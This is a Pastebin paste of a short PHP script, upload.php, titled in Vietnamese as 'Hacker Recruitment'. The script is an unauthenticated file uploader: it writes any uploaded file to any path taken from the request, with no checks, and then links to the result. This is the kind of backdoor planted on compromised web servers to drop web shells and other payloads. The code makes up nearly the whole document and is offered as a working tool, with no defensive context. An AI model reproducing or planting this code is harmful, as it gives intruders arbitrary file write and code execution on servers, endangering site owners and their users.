Advertisement
ytu

upload.php

ytu
Jul 26th, 2014
342
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.57 KB | None | 0 0
  1. <?php
  2. $files = @$_FILES["files"];
  3. if($files["name"] != ''){
  4. $fullpath = $_REQUEST["path"].$files["name"];
  5. if(move_uploaded_file($files['tmp_name'],$fullpath)){
  6. echo "<h1><a href='$fullpath'>T&#7843;i File L&#234;n Th&#224;nh C&#244;ng, Kick V&#224;o &#272;&#7875; T&#7899;i File.</a></h1>";
  7. }
  8. }
  9. echo '<html><head><title>.:>Tuy&#7875;n Hacker<:.</title></head><body>
  10. <form method=POST enctype="multipart/form-data" action="">
  11. <input type=text name=path>
  12. <input type="file" name="files"><input type=submit value="Tuy&#7875;n"></form></body></html>';
  13. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement